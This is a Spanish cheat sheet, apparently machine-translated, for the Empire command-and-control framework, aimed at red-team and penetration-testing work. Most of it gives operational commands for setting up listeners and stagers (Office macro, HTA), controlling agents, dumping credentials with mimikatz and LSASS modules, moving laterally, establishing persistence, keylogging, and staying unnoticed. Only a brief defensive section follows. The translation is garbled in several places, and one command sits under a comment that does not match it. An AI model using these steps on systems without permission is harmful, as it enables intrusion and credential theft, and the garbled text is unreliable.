Hoja de goma marco del Imperio

"Clase de la hoja" id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada

Sinopsis

Empire es un marco post-explotación que incluye un agente de Windows de PowerShell 2.0 puro y un agente Python 3 Linux/macOS puro. Proporciona una poderosa infraestructura de mando y control (C2) para operaciones de equipo rojo, pruebas de penetración y emulación de adversarios.

NOVEDAD Advertencia: Empire es una herramienta de pruebas de seguridad que sólo debe ser utilizada en entornos donde tienes permiso explícito para hacerlo.

Instalación

De GitHub

# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git

# Navigate to the directory
cd Empire

# Run the installation script
sudo ./setup/install.sh

Usando Docker

# Pull the Docker image
docker pull bcsecurity/empire:latest

# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest

En Kali Linux

# Install from package manager
sudo apt update
sudo apt install powershell-empire

Uso básico

Inicio Empire

# Start the Empire server
sudo empire

# Start with REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>

Utilizando Starkiller (GUI)

# Install Starkiller
npm install -g @starkiller/starkiller

# Run Starkiller
starkiller

Empire CLI Navegación

Command	Description
help	Display help menu
menu	Return to the main menu
back	Go back one menu level
exit	Exit Empire
usemodule <module>	Select a module to use
usestager <stager>	Select a stager to use
uselistener <listener>	Select a listener to use
interact <agent>	Interact with an agent
searchmodule <term>	Search for modules

Oyentes

Crear un oyente

# In Empire CLI
listeners
uselistener http
set Name http_listener
set Host 192.168.1.100
set Port 8080
execute

Opciones de escucha común

Option	Description
Name	Name for the listener
Host	IP/hostname for staging
Port	Port for the listener
CertPath	Certificate path for HTTPS
DefaultDelay	Agent callback delay (in seconds)
DefaultJitter	Jitter in agent callbacks (0.0-1.0)
DefaultProfile	Default communication profile
KillDate	Date for the listener to exit (MM/DD/YYYY)
WorkingHours	Hours for the agent to callback (09:00-17:00)

Gestión de escuchas

# List all listeners
listeners

# Kill a listener
kill http_listener

# View a listener's options
info http_listener

Stagers

Generando un Stager

# In Empire CLI
usestager windows/launcher_bat
set Listener http_listener
generate

Tipos comunes de estadilla

Stager	Description
windows/launcher_bat	BAT file launcher
windows/launcher_vbs	VBS script launcher
windows/launcher_powershell	PowerShell launcher
multi/launcher	Multi-platform launcher
osx/launcher	macOS launcher
linux/launcher	Linux launcher
windows/dll	DLL launcher
windows/macro	Office macro launcher
windows/hta	HTA launcher

Agentes

Agente Mandos

# List all agents
agents

# Interact with an agent
interact C2AGENT123

# Get agent info
info

# Execute a shell command
shell whoami

# Run a PowerShell command
powershell Get-Process

# Upload a file
upload /path/to/local/file /path/on/target

# Download a file
download /path/on/target /local/path

# Take a screenshot
screenshot

# Exit agent menu
back

Agent Management

# Rename an agent
rename C2AGENT123 new_name

# Kill an agent
kill C2AGENT123

# Remove an agent from the database
remove C2AGENT123

# Set sleep interval
sleep 30

# Set jitter percentage
sysinfo

Módulos

Utilizando módulos

# List available modules
usemodule

# Search for modules
searchmodule credentials

# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user

# Set module options
set Username administrator

# Execute the module
execute

Common Module Categories

Acceso Credencial

# Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords

# Dump SAM database
usemodule powershell/credentials/sam

# Dump LSASS process
usemodule powershell/credentials/credential_injection/lsass_dump

Sensibilización de la situación

# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user

# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer

# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group

Movimiento Lateral

# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi

# PSExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec

# WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrm

Persistencia

# Registry persistence
usemodule powershell/persistence/userland/registry

# Scheduled task persistence
usemodule powershell/persistence/userland/schtasks

# WMI persistence
usemodule powershell/persistence/elevated/wmi

Características avanzadas

Malleable C2 Profiles

# In Empire CLI
profiles
use default
set DefaultProfile /path/to/profile.profile

OPSEC Consideraciones

# Set agent kill date
set KillDate 01/01/2025

# Set working hours
set WorkingHours 09:00-17:00

# Increase agent sleep time
sleep 300 30

Exfiltración de datos

# Use keylogging module
usemodule powershell/collection/keylogger

# Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor

# Use screenshot module
usemodule powershell/collection/screenshot

Solución de problemas

Cuestiones comunes

1. *Problemas de conciliación *

   # Check if the listener is running
   listeners

   # Verify firewall settings
   sudo iptables -L

   # Check for port conflicts
   netstat -tuln|grep <port>
   ```

2. **El agente no está mirando En**
```bash
   # Verify agent is running
   agents

   # Check for network connectivity issues
   # Verify sleep/jitter settings
   ```

3. ** Fallos de ejecución moderada* *
```bash
   # Check module requirements
   info

   # Verify agent privileges
   shell whoami

   # Try running in a different process context
   usemodule powershell/management/psinject
   ```

## Medidas de defensa

### Métodos de detección
- PowerShell Script Block Logging
- Módulo PowerShell Logging
- AMSI (Antimalware Scan Interface)
- Análisis de tráfico de redes
- Análisis conductual

### Técnicas de prevención
```powershell
# Enable PowerShell Script Block Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

# Enable PowerShell Module Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1

# Enable Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

Recursos

• BC Security GitHub
• Empire Wiki
• Starkiller GitHub
• MITRE ATT limitadaCK - Empire

-...

*Esta hoja de trampa proporciona una referencia completa para usar Empire en escenarios de pruebas de seguridad. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *